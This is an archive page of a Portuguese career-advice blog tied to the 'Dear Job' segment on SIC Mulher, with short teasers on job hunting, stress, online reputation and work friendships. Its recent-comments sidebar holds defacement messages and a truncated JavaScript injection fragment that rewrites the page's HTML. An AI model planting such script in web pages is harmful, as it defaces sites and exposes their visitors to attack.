Dear Job @ 18:32

Seg, 25/02/13

As taxas de desemprego aumentam a cada dia, e as empresas a reduzir pessoas são cada vez mais. Andar à procura de emprego, recorrendo às antigas formas (enviar CV, pedir entrevistas, responder a anúncios, ler manuais de pesquisa de emprego, saber como comportar-se numa entrevista ou como deve ir vestida) não resulta, está visto!

Pior: quanto mais elevada a idade, menor a probabilidade de encontrar alguma coisa. Todos conhecemos pessoas nesta situação e cada vez mais vamos fazer parte deste grupo.

Para além disto o perfil das profissões está a alterar-se profundamente. Há profissões a desaparecer e outras novas a surgir. O que fazer?

Como resultado da minha experiência com o projecto “Alfa Beta”, vou partilhar alguns comportamentos e experiências que têm tido excelentes resultados com muitas pessoas.

 

Por isso já sabe, não perca no Mais Mulher desta terça-feira às 17:30 na SIC Mulher!

 

Mas se não viu. Veja o vídeo aqui!

 




Tags:


Dear Job @ 18:31

Seg, 28/01/13

Muitas vezes perguntam-me como é que eu consigo gerir tanta coisa em tão pouco tempo: viagens constantes, gerir uma empresa, pessoas, fazer apresentações, coaching e formação, preparar projectos, o Dear Job e outros programas na Sic, escrever artigos, estabelecer novas parcerias e ainda ter tempo para a família, amigos e para mim. Parece difícil? È, mas não tanto assim.

 

No próximo Dear Job desta terça-feira explico-lhe como. Na SIC Mulher, ás 17:30! Não perca...

 

E se não viu! veja o vídeo aqui.

 

 


Tags:


Dear Job @ 19:24

Seg, 26/11/12

Estamos a trabalhar mais do que nunca e o mínimo que se espera é que façamos mais com menos.

E quando a exigência excede a nossa capacidade de resposta, sacrificamos imediatamente o nosso tempo pessoal.

 

Dormimos pouco, comemos mal e apressadamente, bebemos cafeína para estarmos acordados, e à noite relaxamos com álcool e medicamentos. Sente-se em sobrecarga?

 

No próximo Dear Job vamos dizer-lhe como pode aliviar a tensão.

 

Na Sic Mulher às 17:30 desta terça-feira!

 

Veja o vídeo aqui!


Tags:


Dear Job @ 19:31

Seg, 29/10/12

Porque é que as pessoas se sentem perdidas nas suas vidas (e trabalho)? Numa altura onde tudo parece incerto e inseguro, é fundamental ter algumas amarras e perceber de onde vem este sentimento de que andamos todos à deriva e sem rumo certo. Por isso, no Próximo Dera Job, vamos apresentar algumas razões que irão ajudar a perceber e a lidar com estes sentimentos.

 

Veja o vídeo aqui!


Tags:


Dear Job @ 18:31

Seg, 23/07/12

Chegámos a meio do ano, e é o momento de fazer uma pausa. Após seis meses em que as dificuldades estiveram presentes como nunca, devemos aproveitar o Verão para relaxar e olhar para as coisas com uma nova perspectiva. Passar as férias ou o Verão preocupados não vai ajudar muito, por isso seguem algumas frescas sugestões para um excelente réntree.


Tags:


Dear Job @ 18:31

Seg, 09/07/12

Pode não saber, mas é muito provável que já tenha criado a sua reputação online. Hoje a internet e as redes sociais tomaram conta do mundo, e o paradigma mudou. Na internet, criamos a nossa imagem através das informações que partilhamos em blogs, comentários, fotos, vídeos e links. Os outros acrescentam a sua opinião (boa ou má), o que contribui para a reputação.
O mundo é público e ainda estamos a aprender a lidar com isso, e na procura e manutenção do seu trabalho ter uma boa reputação é muito importante, mas ter também uma boa reputação online é essencial, pois hoje em dia assim que alguém ouvir falar de si, é bem provável que a vá pesquisar online.

No próximo Dear Job vamos falar de reputação online e de como defendê-la.


Tags:


Dear Job @ 18:33

Seg, 25/06/12

Sabia que atualmente a palavra de ordem é resistir?! Mais do que alcançar o Sucesso?! Esta rubrica dá-lhe todas as respostas que procura, e altera as suas crenças perigosas!

Não perca o espaço "Dear Job", com Lúcio Lampreia...


Tags:


Dear Job @ 18:31

Seg, 11/06/12

As soluções biológicas são um exemplo determinante a seguir. Seja pró-activo na sua vida, e arrisque na criação de um modelo de negócio que lhe proporcione aquilo que precisa e deixe os receios para outros dias. são estas as dicas do nosso convidado, Lúcio lampreia, que nos contará tudo na rubrica "Dear Job"!


Tags:


Dear Job @ 18:32

Seg, 14/05/12

Lúcio Lampreia estará connosco para uma conversa que nos demonstra a atitude correcta a exibir neste momento que atravessamos!

 

Gostava de poder utilizar os seus conhecimentos, no mercado de trabalho, de uma forma mais apetecível? É tempo de Procurar Novas Janelas! E é isso mesmo que nos vai explicar, Lúcio Lampreia e a rubrica "Dear Job".


Tags:


Dear Job @ 18:31

Seg, 30/04/12

Têm surgido estudos ao longo da última década que apontam para a importância de ter uma boa rede social de apoio no trabalho. De facto, se passamos mais de 40 horas por semana a trabalhar é muito importante ter boas relações e cultivá-las: dão-nos mais saúde, bem-estar e anos de vida.

De facto, temos observado que estas redes de apoio laboral não são apenas importantes para o alcançar dos nossos objetivos, mas também para a manutenção da nossa própria saúde. Estudos mostraram que um baixo nível de apoio e más relações no trabalho, podem aumentar os níveis de stress, gerar dificuldades de concentração, insónias e aumentar o tempo de recuperação do corpo a situações stressantes.

Numa altura em que os níveis de stress aumentam e a pressão para resultados está a ser cada vez mais sentida, precisamos da ajuda de todos à nossa volta para suportar e atravessar com sucesso este momento particularmente difícil.

 

Por isso, no Próximo Dear Job, vamos falar sobre “Amigas das 9 às 6”. Quem são? Como os conquistar e desenvolver boas relações.


Tags:

Facebook Like

Pub
Rubricas
Comentários recentes
Kd o vídeo?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...
HACKED BY BRIAN_POSIXHACKED BY BRIAN_POSIXHACKED B...
Hacked By Brian_posix !!SIC MULHER PWNED BY BPOSIX...
document.documentElement.innerHTML=unescape("Hacke...
Amei <3 mt
https://m.facebook.com/Veredictod1amor/insights/
Acabei de o receber, muito obrigada!
Pesquisar
 
subscrever feeds
blogs SAPO